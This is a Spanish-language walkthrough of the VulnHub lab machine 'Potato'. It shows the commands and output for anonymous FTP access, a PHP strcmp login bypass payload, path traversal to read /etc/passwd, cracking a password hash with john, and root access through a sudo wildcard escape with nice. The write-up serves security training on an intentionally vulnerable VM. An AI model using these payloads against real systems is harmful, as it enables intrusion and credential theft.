[VULNHUB] Potato

Hoy vamos a hackear la maquina de Vulnhub llamada Potato. Podeis descargarla desde el siguiente enlace: Potato

Video


Enumeration


Empezamos con un nmap para ver que puertos tiene abiertos.

~ > nmap -A -p- 192.168.1.136                                                                                                                           
Starting Nmap 7.70 ( https://nmap.org ) at 2020-09-10 11:09 CEST
Nmap scan report for 192.168.1.136
Host is up (0.00043s latency).
Not shown: 65532 closed ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 
2.0)
80/tcp   open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Potato company
2112/tcp open  ftp
| fingerprint-strings: 
|   GenericLines: 
|     220 ProFTPD Server (Debian) [::ffff:192.168.1.136]
|     Invalid command: try being more creative
|_    Invalid command: try being more creative
1 service unrecognized despite returning data. If you know the service/version, 
please submit the following fingerprint at 
https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port2112-TCP:V=7.70%I=7%D=9/10%Time=5F59ED59%P=x86_64-pc-linux-gnu%r(Ge
SF:nericLines,90,"220\x20ProFTPD\x20Server\x20\(Debian\)\x20\[::ffff:192\.
SF:168\.1\.136\]\r\n500\x20Invalid\x20command:\x20try\x20being\x20more\x20
SF:creative\r\n500\x20Invalid\x20command:\x20try\x20being\x20more\x20creat
SF:ive\r\n");
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at 
https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 66.77 seconds
Vemos que tiene HTTP, SSH y FTP en el puerto 2112. Nos conectamos al FTP con anonymous/anonymous para ver que hay.

~ > ftp 192.168.1.136 2112                                                    
Connected to 192.168.1.136.
220 ProFTPD Server (Debian) [::ffff:192.168.1.136]
Name (192.168.1.136:sml): anonymous
331 Anonymous login ok, send your complete email address as your password
Password:
230-Welcome, archive user anonymous@192.168.1.59 !
230-
230-The local time is: Thu Sep 10 11:12:03 2020
230-
230 Anonymous access granted, restrictions apply
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -la
200 PORT command successful
150 Opening ASCII mode data connection for file list
drwxr-xr-x   2 ftp      ftp          4096 Aug  2 19:33 .
drwxr-xr-x   2 ftp      ftp          4096 Aug  2 19:33 ..
-rw-r--r--   1 ftp      ftp           901 Aug  2 19:33 index.php.bak
-rw-r--r--   1 ftp      ftp            54 Aug  2 18:17 welcome.msg
226 Transfer complete
ftp> 
Nos descargamos el fichero index.php.baj.

ftp> get index.php.bak
local: index.php.bak remote: index.php.bak
200 PORT command successful
150 Opening BINARY mode data connection for index.php.bak (901 bytes)
226 Transfer complete
901 bytes received in 0.00 secs (928.1464 kB/s)
ftp> get welcome.msg
local: welcome.msg remote: welcome.msg
200 PORT command successful
150 Opening BINARY mode data connection for welcome.msg (54 bytes)
226 Transfer complete
54 bytes received in 0.00 secs (1.1704 MB/s)
ftp> 
Le echamos un vistazo.

~ > cat index.php.bak 
---SNIP---
  if (strcmp($_POST['username'], "admin") == 0  && strcmp($_POST['password'], 
$pass) == 0) {
---SNIP---
Vemos que en el codigo php utilizan la funcion strcmp la cual es vulnerable[1]. Sabiendo esto, usamos gobuster para ver si encontramos algun directorio interesante en la web.

~ > gobuster dir -u http://192.168.1.136/ -w 
/usr/share/wordlists/SecLists/Discovery/Web-Content/common.txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://192.168.1.136/
[+] Threads:        10
[+] Wordlist:       
/usr/share/wordlists/SecLists/Discovery/Web-Content/common.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2020/09/10 11:10:43 Starting gobuster
===============================================================
/.hta (Status: 403)
/.htpasswd (Status: 403)
/admin (Status: 301)
/.htaccess (Status: 403)
/index.php (Status: 200)
/server-status (Status: 403)
===============================================================
2020/09/10 11:10:46 Finished
===============================================================
Encontramos el directorio /admin :) Al visitar http://192.168.1.136/admin nos aparece una web donde debemos meter usuario y password. Como ya hemos visto el codigo y conocemos la vulnerabilidad, arrancamos Burp, ponemos como usuario "admin" y como password lo que queramos... Una vez capturada la request, la modificamos por:

username=admin&password[]=%22%22
Ha funcionado :) Ahora debemos hacer clic en "dashboard". Dentro de Dashboard tenemos varias "opciones", pero si miramos la de "Log" veremos que podemos escoger 3 ficheros. Escogemos cualquiera de ellos y capturamos la request con Burp. Modificaremos el parametro "file=" para que nos muestre el /etc/passwd quedando la request de la siguiente manera

POST /admin/dashboard.php?page=log HTTP/1.1
Host: 192.168.1.136
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://192.168.1.136/admin/dashboard.php?page=log
Content-Type: application/x-www-form-urlencoded
Content-Length: 30
DNT: 1
Connection: close
Cookie: pass=serdesfsefhijosefjtfgyuhjiosefdfthgyjh
Upgrade-Insecure-Requests: 1

file=../../../../../etc/passwd
Nos devuelve:

Contenu du fichier ../../../../../etc/passwd :  
---SNIP---
webadmin:$1$webadmin$3sXBxGUtDGIFAcnNTNhi6/:1001:1001:webadmin,,,:/home/webadmin
---SNIP---
Vemos que hay un usuario llamado webadmin y aparece su password cifrada. Usamos john para crackear la password!

~/Descargas/john-1.9.0-jumbo-1/run > ./john 
--wordlist=/usr/share/wordlists/rockyou.txt ~/tocrack.txt 
Warning: detected hash type "md5crypt", but the string is also recognized as 
"md5crypt-long"
Use the "--format=md5crypt-long" option to force loading these as that type 
instead
Using default input encoding: UTF-8
Loaded 1 password hash (md5crypt, crypt(3) $1$ (and variants) [MD5 256/256 AVX2 
8x3])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
dragon           (webadmin)
1g 0:00:00:00 DONE (2020-09-10 12:31) 100.0g/s 19200p/s 19200c/s 19200C/s 
123456..november
Use the "--show" option to display all of the cracked passwords reliably
Session completed
Vemos que john consigue la password. Nos logueamos al ssh con los credenciales obtenidos (webadmin/dragon).

Low Shell



~ > ssh webadmin@192.168.1.136
webadmin@192.168.1.136's password: 
Welcome to Ubuntu 20.04 LTS (GNU/Linux 5.4.0-42-generic x86_64)
 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Thu 10 Sep 2020 12:31:36 PM UTC

  System load:             0.08
  Usage of /:              12.6% of 31.37GB
  Memory usage:            36%
  Swap usage:              0%
  Processes:               114
  Users logged in:         0
  IPv4 address for enp0s3: 192.168.1.136
  IPv6 address for enp0s3: 2a01:c50e:21e3:0:a00:27ff:fe89:8d97

Last login: Sun Aug  2 19:56:20 2020 from 192.168.1.11
webadmin@serv:~$ 

user.txt



webadmin@serv:~$ ls -la
total 32
drwxr-xr-x 3 webadmin webadmin 4096 Aug  2 19:26 .
drwxr-xr-x 4 root     root     4096 Aug  2 18:18 ..
-rw------- 1 webadmin webadmin  357 Aug  2 19:10 .bash_history
-rw-r--r-- 1 webadmin webadmin  220 Aug  2 18:18 .bash_logout
-rw-r--r-- 1 webadmin webadmin 3771 Aug  2 18:18 .bashrc
drwx------ 2 webadmin webadmin 4096 Aug  2 18:34 .cache
-rw-r--r-- 1 webadmin webadmin  807 Aug  2 18:18 .profile
-rw------- 1 webadmin root       69 Aug  2 19:26 user.txt
webadmin@serv:~$ cat user.txt
TGUgY29udHLDtGxlIGVzdCDDoCBwZXUgcHLDqHMgYXVzc2kgcsOpZWwgcXXigJl1bmUg

Privilege Escalation


Miramos si podemos hacer algo con sudo.

webadmin@serv:/home/florianges$ sudo -l
[sudo] password for webadmin: 
Sorry, try again.
[sudo] password for webadmin: 
Matching Defaults entries for webadmin on serv:
    env_reset, mail_badpass, 
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/
snap/bin

User webadmin may run the following commands on serv:
    (ALL : ALL) /bin/nice /notes/*
Vemos que podemos ejecutar nice al directorio /notes/*. Aprovecharemos ese * :)

webadmin@serv:~$ echo "/bin/bash" > shell.sh
webadmin@serv:~$ chmod 777 shell.sh 
webadmin@serv:~$ sudo /bin/nice /notes/../home/webadmin/shell.sh
root@serv:/home/webadmin# id
uid=0(root) gid=0(root) groups=0(root)

root.txt



root@serv:/home/webadmin# cd /root
root@serv:~# ls
root.txt  snap
root@serv:~# cat root.txt 
bGljb3JuZSB1bmlqYW1iaXN0ZSBxdWkgZnVpdCBhdSBib3V0IGTigJl1biBkb3VibGUgYXJjLWVuLWNp
ZWwuIA==

End


Y con esto ya seriamos root de la maquina. [1]https://www.doyler.net/security-not-included/bypassing-php-strcmp-abctf2016